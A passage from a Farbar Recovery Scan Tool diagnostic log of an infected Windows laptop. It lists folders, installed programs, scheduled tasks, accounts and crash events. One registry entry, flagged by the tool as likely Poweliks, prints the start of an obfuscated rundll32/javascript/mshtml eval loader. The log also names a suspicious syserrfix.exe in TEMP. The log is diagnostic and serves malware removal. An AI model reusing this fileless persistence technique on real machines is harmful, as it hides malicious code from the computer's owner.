HD</p><p>2014-11-25 01:38 - 2014-06-08 18:23 - 00000000 ____D () C:\Program Files (x86)\Youtube Downloader HD</p><p>2014-11-24 09:27 - 2013-01-25 11:22 - 00000000 ____D () C:\Users\johnsmith\Documents\Calibre Library</p><p>2014-11-23 08:56 - 2014-02-10 11:26 - 00000000 ____D () C:\Users\johnsmith\Desktop\books to load</p><p>2014-11-20 09:59 - 2013-02-15 21:16 - 00000000 ____D () C:\Users\johnsmith\AppData\Local\QuickPar</p><p>2014-11-19 14:35 - 2013-01-29 23:17 - 00001891 _____ () C:\Users\johnsmith\Desktop\Mirc searches.txt</p><p>2014-11-19 14:20 - 2013-01-24 23:03 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\mIRC</p><p>2014-11-19 14:13 - 2013-02-14 23:18 - 00000000 ____D () C:\Users\johnsmith\Documents\My Kindle Content</p><p>2014-11-19 13:39 - 2014-10-10 20:59 - 00000273 _____ () C:\Users\johnsmith\Desktop\Monthly Finances.txt</p><p>2014-11-14 15:30 - 2014-05-08 13:10 - 00003900 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA</p><p>2014-11-14 15:30 - 2014-05-08 13:10 - 00003664 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore</p><p>2014-11-13 18:16 - 2013-01-27 22:53 - 00001701 _____ () C:\Users\johnsmith\Desktop\IMDB.url</p><p>2014-11-11 04:53 - 2014-07-01 15:43 - 00000000 ____D () C:\Users\johnsmith\Desktop\Nicole's New Job Search</p><p>2014-11-09 09:23 - 2014-04-29 09:48 - 00000000 ____D () C:\Users\johnsmith\AppData\Roaming\HandBrake</p><p>2014-11-07 10:05 - 2013-09-06 09:47 - 00000000 ____D () C:\Windows\Minidump</p><p>2014-11-06 11:33 - 2013-01-24 21:18 - 00000000 ____D () C:\Users\johnsmith</p><p></p><p>Some content of TEMP:</p><p>====================</p><p>C:\Users\johnsmith\AppData\Local\Temp\syserrfix.exe</p><p></p><p></p><p>==================== Bamital & volsnap Check =================</p><p></p><p>(There is no automatic fix for files that do not pass verification.)</p><p></p><p>C:\Windows\System32\winlogon.exe => File is digitally signed</p><p>C:\Windows\System32\wininit.exe => File is digitally signed</p><p>C:\Windows\explorer.exe => File is digitally signed</p><p>C:\Windows\SysWOW64\explorer.exe => File is digitally signed</p><p>C:\Windows\System32\svchost.exe => File is digitally signed</p><p>C:\Windows\SysWOW64\svchost.exe => File is digitally signed</p><p>C:\Windows\System32\services.exe => File is digitally signed</p><p>C:\Windows\System32\User32.dll => File is digitally signed</p><p>C:\Windows\SysWOW64\User32.dll => File is digitally signed</p><p>C:\Windows\System32\userinit.exe => File is digitally signed</p><p>C:\Windows\SysWOW64\userinit.exe => File is digitally signed</p><p>C:\Windows\System32\rpcss.dll => File is digitally signed</p><p>C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed</p><p></p><p></p><p>LastRegBack: 2014-11-23 23:14</p><p></p><p>==================== End Of Log ============================</p><p></p><p></p><p>Additional scan result of Farbar Recovery Scan Tool (x64) Version: 30-11-2014 01</p><p>Ran by johnsmith at 2014-11-30 21:08:19</p><p>Running from C:\Users\johnsmith\Desktop</p><p>Boot Mode: Normal</p><p>==========================================================</p><p></p><p></p><p>==================== Security Center ========================</p><p></p><p>(If an entry is included in the fixlist, it will be removed.)</p><p></p><p>AV: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}</p><p>AS: Windows Defender (Enabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}</p><p></p><p>==================== Installed Programs ======================</p><p></p><p>(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)</p><p></p><p>4 Elements II (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)</p><p>Adobe Reader XI (11.0.01) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.01 - Adobe Systems Incorporated)</p><p>Adobe Shockwave Player 11.6 (HKLM-x32\...\Adobe Shockwave Player) (Version: 11.6.5.635 - Adobe Systems, Inc.)</p><p>Amazon Kindle (HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\Amazon Kindle) (Version: - Amazon)</p><p>ArcSoft Panorama Maker 6 (HKLM-x32\...\{E9CBC8FA-BF1F-4956-8B75-0D314682FE5F}) (Version: 6.0.0.92 - ArcSoft)</p><p>AuthenTec TrueAPI 64-bit (Version: 1.6.0.86 - AuthenTec, Inc.) Hidden</p><p>Bejeweled 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Binreader (HKLM-x32\...\{3D47B2C0-8748-4450-99AE-0746A5A74C8E}) (Version: 1.0.0 - Binreader)</p><p>Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)</p><p>Build-a-lot 4 - Power Source (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>calibre 64bit (HKLM\...\{0F072A3A-7D6F-4CE0-AB44-10DB3A7B3852}) (Version: 1.17.0 - Kovid Goyal)</p><p>Chuzzle Deluxe (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>Classic Shell (HKLM\...\{CB00799C-0E4F-4FD1-A046-BD24321BCDFF}) (Version: 3.6.5 - IvoSoft)</p><p>Cradle Of Egypt Collector's Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Cradle of Rome 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>CyberLink LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1.5407 - CyberLink Corp.)</p><p>CyberLink Media Suite 10 (HKLM-x32\...\InstallShield_{1FBF6C24-C1fD-4101-A42B-0C564F9E8E79}) (Version: 10.0.1.1916 - CyberLink Corp.)</p><p>CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{4862344A-A39C-4897-ACD4-A1BED5163C5A}) (Version: 2.0.1.3119 - CyberLink Corp.)</p><p>CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.1.1926 - CyberLink Corp.)</p><p>CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.1.1925 - CyberLink Corp.)</p><p>CyberLink PowerDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.6.4319 - CyberLink Corp.)</p><p>CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 3.5.4.5527 - CyberLink Corp.)</p><p>D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden</p><p>Energy Star (HKLM\...\{0FA995CC-C849-4755-B14B-5404CC75DC24}) (Version: 1.0.8 - Hewlett-Packard)</p><p>Farm Frenzy (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>FATE: The Cursed King (x32 Version: 2.2.0.97 - WildTangent) Hidden</p><p>Final Drive Fury (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>FlatOut 2 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Free Alarm Clock 2.7.1 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 2.7 - Comfort Software Group)</p><p>Google Chrome (HKLM-x32\...\Google Chrome) (Version: 39.0.2171.71 - Google Inc.)</p><p>Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden</p><p>Governor of Poker 2 Premium Edition (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>HandBrake 0.9.9.1 (HKLM-x32\...\HandBrake) (Version: 0.9.9.1 - )</p><p>Hard Disk Scrubber 3.4 (Remove Only) (HKLM-x32\...\{DE47ADD1-B82B-4B52-AF29-76AE7EF4E19D}_is1) (Version: - Summit Computer Networks, Inc.)</p><p>HDR Efex Pro 2 (HKLM-x32\...\HDR Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.)</p><p>Hewlett-Packard ACLM.NET v1.2.0.0 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden</p><p>Hoyle Card Games (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>HP 3D DriveGuard (HKLM\...\{F244D07D-1876-4CDD-914D-214E15A8D327}) (Version: 4.2.5.1 - Hewlett-Packard Company)</p><p>HP Connected Backup (HKLM-x32\...\{6BA5F6E7-6CC1-4117-816D-A549A06CE44E}) (Version: 8.7.0.0 - Autonomy)</p><p>HP Connected Music (Meridian - installer) (HKLM-x32\...\StartHPConnectedMusic) (Version: v1.0 - Meridian Audio Ltd)</p><p>HP CoolSense (HKLM-x32\...\{16B7BDA1-B967-4D2D-8B27-E12727C28350}) (Version: 2.10.3 - Hewlett-Packard Company)</p><p>HP Documentation (HKLM-x32\...\{0EF47DBD-7E67-492F-9423-DAF028BEF627}) (Version: 1.1.0.0 - Hewlett-Packard)</p><p>HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.3.0 - WildTangent)</p><p>HP MyRoom (HKLM-x32\...\{9C35EDE5-4B0F-45E7-A438-314BA889948E}) (Version: 9.0.0.0 - Hewlett-Packard Company)</p><p>HP Quick Launch (HKLM-x32\...\{609B11CC-8CED-4116-AD8A-A72168894D39}) (Version: 3.0.4 - Hewlett-Packard Company)</p><p>HP Registration Service (HKLM\...\{E4D6CCF2-0AAF-4B9C-9DE5-893EDC9B4BAA}) (Version: 1.0.5976.4186 - Hewlett-Packard)</p><p>HP SimplePass (HKLM-x32\...\{34C821CA-6B55-44A0-8A9B-2EF471D6019E}) (Version: 6.0.100.244 - Hewlett-Packard)</p><p>HP Software Framework (HKLM-x32\...\{835B275B-F29B-464B-BD4B-097FD55FAB0A}) (Version: 4.6.8.1 - Hewlett-Packard Company)</p><p>HP Support Assistant (HKLM-x32\...\{B8019B54-F9BE-490A-9619-6D06F18F129F}) (Version: 7.0.32.44 - Hewlett-Packard Company)</p><p>HP Utility Center (HKLM-x32\...\{0C57987A-A03A-4B95-A309-D23F78F406CA}) (Version: 1.0.7 - Hewlett-Packard)</p><p>HP Wireless Button Driver (HKLM-x32\...\{941DE69D-6CEE-4171-8F1F-3D7E352AA498}) (Version: 1.0.5.1 - Hewlett-Packard Company)</p><p>IDT Audio (HKLM-x32\...\{E3A5A8AB-58F6-45FF-AFCB-C9AE18C05001}) (Version: 1.0.6417.0 - IDT)</p><p>Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)</p><p>Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1252 - Intel Corporation)</p><p>Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2817 - Intel Corporation)</p><p>Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)</p><p>Jewel Match 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>John Deere Drive Green (x32 Version: 2.2.0.95 - WildTangent) Hidden</p><p>Luxor Evolved (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Mahjongg Dimensions Deluxe: Tiles in Time (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Malwarebytes Anti-Malware version 2.0.3.1025 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.3.1025 - Malwarebytes Corporation)</p><p>Microsoft Office (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.6120.5004 - Microsoft Corporation)</p><p>Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation)</p><p>Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729 (HKLM\...\{4FFA2088-8317-3B14-93CD-4C699DB37843}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729 (HKLM-x32\...\{3C3D696B-0DB7-3C6D-A356-3DB8CE541918}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)</p><p>Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)</p><p>mIRC (HKLM-x32\...\mIRC) (Version: 7.22 - mIRC Co. Ltd.)</p><p>Mortimer Beckett and the Crimson Thief Premium Edition (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Mystery P.I. - Curious Case of Counterfeit Cove (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Nero 12 (HKLM-x32\...\{560FC78C-A4B2-461D-9B47-820C1EEF87B8}) (Version: 12.0.02000 - Nero AG)</p><p>PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden</p><p>Peggle Nights (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Penguins! (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Perfect Resize 7.0.1 Professional Edition (HKLM-x32\...\{FCADA4FF-142C-42A8-B73C-0A54A7F83345}) (Version: 7.0.1 - onOne Software)</p><p>Photomatix Pro version 4.2.4 (HKLM\...\PhotomatixPro42x64_is1) (Version: 4.2.4 - HDRsoft Sarl)</p><p>Polar Bowler (x32 Version: 2.2.0.97 - WildTangent) Hidden</p><p>Polar Golfer (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Prerequisite installer (x32 Version: 12.0.0002 - Nero AG) Hidden</p><p>Privacy Eraser (HKLM\...\{CB5AC03C-B8AD-980F-998E-51969A6DFC9F}_is1) (Version: 2.8.0.639 - Cybertron Software Co., Ltd.)</p><p>Ralink RT5390R 802.11bgn Wi-Fi Adapter (HKLM-x32\...\{8FC4F1DD-F7FD-4766-804D-3C8FF1D309AF}) (Version: 5.0.2.0 - Ralink)</p><p>Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.3.730.2012 - Realtek)</p><p>Realtek PCIE Card Reader (HKLM-x32\...\{C1594429-8296-4652-BF54-9DBE4932A44C}) (Version: 6.2.8400.27025 - Realtek Semiconductor Corp.)</p><p>Roads of Rome 3 (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Silver Efex Pro 2 (HKLM-x32\...\Silver Efex Pro 2) (Version: 2.0.0.0 - Nik Software, Inc.)</p><p>Skype™ 6.16 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.16.105 - Skype Technologies S.A.)</p><p>swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden</p><p>Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 16.2.10.12 - Synaptics Incorporated)</p><p>Tales of Lagoona (x32 Version: 2.2.0.110 - WildTangent) Hidden</p><p>Tixati (HKLM-x32\...\tixati) (Version: - )</p><p>TreeSize Free V2.7 (HKLM-x32\...\TreeSize Free_is1) (Version: 2.7 - JAM Software)</p><p>Update Installer for WildTangent Games App (x32 Version: - WildTangent) Hidden</p><p>Vacation Quest™ - Australia (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p>Validity WBF DDK (HKLM\...\{1F91C200-8F0F-4009-A75E-DB6CE151BD4E}) (Version: 4.4.234.0 - Validity Sensors, Inc.)</p><p>VC 9.0 Runtime (x32 Version: 1.0.0 - Check Point Software Technologies Ltd) Hidden</p><p>VLC media player (HKLM-x32\...\VLC media player) (Version: 2.1.5 - VideoLAN)</p><p>Welcome App (Start-up experience) (x32 Version: 12.0.14000 - Nero AG) Hidden</p><p>WildTangent Games (HKLM-x32\...\WildTangent wildgames Master Uninstall) (Version: 1.0.3.0 - WildTangent)</p><p>WildTangent Games App (x32 Version: 4.0.9.6 - WildTangent) Hidden</p><p>Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3555.0308 - Microsoft Corporation)</p><p>WinRAR 4.00 (64-bit) (HKLM\...\WinRAR archiver) (Version: 4.00.0 - win.rar GmbH)</p><p>Youtube Downloader HD v. 2.9.9.16.2 (HKLM-x32\...\Youtube Downloader HD_is1) (Version: - YoutubeDownloaderHD.com)</p><p>Zuma's Revenge (x32 Version: 2.2.0.98 - WildTangent) Hidden</p><p></p><p>==================== Custom CLSID (selected items): ==========================</p><p></p><p>(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)</p><p></p><p>CustomCLSID: HKU\S-1-5-21-2762839642-1568754923-376086736-1001_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?</p><p></p><p>==================== Restore Points =========================</p><p></p><p>29-11-2014 19:44:30 Scheduled Checkpoint</p><p></p><p>==================== Hosts content: ==========================</p><p></p><p>(If needed Hosts: directive could be included in the fixlist to reset Hosts.)</p><p></p><p>2012-07-25 22:26 - 2012-07-25 22:26 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts</p><p></p><p>==================== Scheduled Tasks (whitelisted) =============</p><p></p><p>(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)</p><p></p><p>Task: {44887619-6412-414B-896F-45E47A0080D8} - System32\Tasks\MirageAgent => C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe [2012-07-27] (CyberLink)</p><p>Task: {5EBFA391-93A2-42F0-8C59-966AFE87038F} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.)</p><p>Task: {5ED0D22D-A9B4-4852-A748-30F6CA9CC9C0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2012-08-10] (Hewlett-Packard Company)</p><p>Task: {727E8D00-4042-4C2E-9218-079ECF9F7AE1} - System32\Tasks\Synaptics TouchPad Enhancements => \Program Files\Synaptics\SynTP\SynTPEnh.exe [2012-08-24] (Synaptics Incorporated)</p><p>Task: {72E3FF20-73DF-437C-BF3D-0A8F3877FD7A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-05-08] (Google Inc.)</p><p>Task: {8F075D28-AFF0-4171-AED6-C76737CC070C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater7\HPSFUpdater.exe [2012-08-07] (Hewlett-Packard Company)</p><p>Task: {B3D38C21-AAA2-49A7-956D-33969C76338A} - System32\Tasks\Cybertron\Privacy Eraser\SkipUAC => C:\Program Files\Cybertron\Privacy Eraser\PrivacyEraser.exe [2014-06-16] (Cybertron Software, Co., Ltd.)</p><p>Task: {DAFF4139-76A3-4C78-8758-708F3D7C2C2D} - System32\Tasks\CLMLSvc_P2G8 => C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe [2012-06-07] (CyberLink)</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</p><p>Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe</p><p></p><p>==================== Loaded Modules (whitelisted) =============</p><p></p><p>2013-01-25 11:54 - 2011-03-02 10:40 - 00164864 _____ () C:\Program Files\WinRAR\rarext.dll</p><p>2012-09-06 02:47 - 2012-09-06 02:47 - 00028160 _____ () C:\Windows\system32\valWBFPolicyService.exe</p><p>2012-08-10 02:36 - 2012-08-10 02:36 - 04073320 _____ () C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe</p><p>2012-07-28 08:31 - 2012-07-28 08:31 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll</p><p>2012-11-21 00:32 - 2012-06-07 20:34 - 00627216 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMediaLibrary.dll</p><p>2012-06-08 12:34 - 2012-06-08 12:34 - 00016400 _____ () C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvcPS.dll</p><p>2012-11-21 00:15 - 2012-06-25 11:41 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll</p><p></p><p>==================== Alternate Data Streams (whitelisted) =========</p><p></p><p>(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)</p><p></p><p>AlternateDataStreams: C:\Windows:nlsPreferences</p><p></p><p>==================== Safe Mode (whitelisted) ===================</p><p></p><p>(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)</p><p></p><p></p><p>==================== EXE Association (whitelisted) =============</p><p></p><p>(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)</p><p></p><p></p><p>==================== MSCONFIG/TASK MANAGER disabled items =========</p><p></p><p>(Currently there is no automatic fix for this section.)</p><p></p><p>HKLM\...\StartupApproved\Run32: => "SwitchBoard"</p><p>HKU\S-1-5-21-2762839642-1568754923-376086736-1001\...\StartupApproved\Run: => "FreeAC"</p><p></p><p>========================= Accounts: ==========================</p><p></p><p>Administrator (S-1-5-21-2762839642-1568754923-376086736-500 - Administrator - Disabled)</p><p>Guest (S-1-5-21-2762839642-1568754923-376086736-501 - Limited - Disabled)</p><p>johnsmith (S-1-5-21-2762839642-1568754923-376086736-1001 - Administrator - Enabled) => C:\Users\johnsmith</p><p></p><p>==================== Faulty Device Manager Devices =============</p><p></p><p></p><p>==================== Event log errors: =========================</p><p></p><p>Application errors:</p><p>==================</p><p>Error: (11/30/2014 09:07:26 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5094a012</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x9e8</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 09:05:22 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a5b9</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x1c54</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 08:35:11 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe, version: 1.2.3.4, time stamp: 0x2a425e19</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x0002076b</p><p>Faulting process id: 0xafc</p><p>Faulting application start time: 0x{d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe0</p><p>Faulting application path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe1</p><p>Faulting module path: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe2</p><p>Report Id: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe3</p><p>Faulting package full name: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe4</p><p>Faulting package-relative application ID: {d85e723d-4671-ed21-e924-8ceaa2893eb5}.exe5</p><p></p><p>Error: (11/30/2014 08:09:43 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x50109de9</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x00061206</p><p>Faulting process id: 0x1564</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 08:09:35 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: iexplore.exe, version: 10.0.9200.16453, time stamp: 0x5010a862</p><p>Faulting module name: ntdll.dll, version: 6.2.9200.16384, time stamp: 0x5010ae7a</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x0002fb1e</p><p>Faulting process id: 0x510</p><p>Faulting application start time: 0xiexplore.exe0</p><p>Faulting application path: iexplore.exe1</p><p>Faulting module path: iexplore.exe2</p><p>Report Id: iexplore.exe3</p><p>Faulting package full name: iexplore.exe4</p><p>Faulting package-relative application ID: iexplore.exe5</p><p></p><p>Error: (11/30/2014 07:49:08 PM) (Source: Application Error) (EventID: 1000) (User: )</p><p>Description: Faulting application name: powershell.exe, version: 6.2.9200.16384, time stamp: 0x50109cce</p><p>Faulting module name: unknown, version: 0.0.0.0, time stamp: 0x00000000</p><p>Exception code: 0xc0000005</p><p>Fault offset: 0x034731a0</p><p>Faulting process id: 0xd70</p><p>Faulting application start time: 0xpowershell.exe0</p><p>Faulting application path: powershell.exe1</p><p>Faulting module path: powershell.exe2</p><p>Report Id: powershell.exe3</p><p>Faulting package full name: powershell.exe4</p><p>Faulting package-relative application ID: powershell.exe5</p><p></p><p>Error: (11/30/2014 07:49:02 PM) (Source: .NET Runtime) (EventID: 1026) (User: )</p><p>Description: Application: powershell.exe</p><p>Framework Version: v4.0.30319</p><p>Description: The process was terminated due to an unhandled exception.</p><p>Exception Info: System.AccessViolationException</p><p>Stack:</p><p> at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)</p><p> at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)</p><p> at 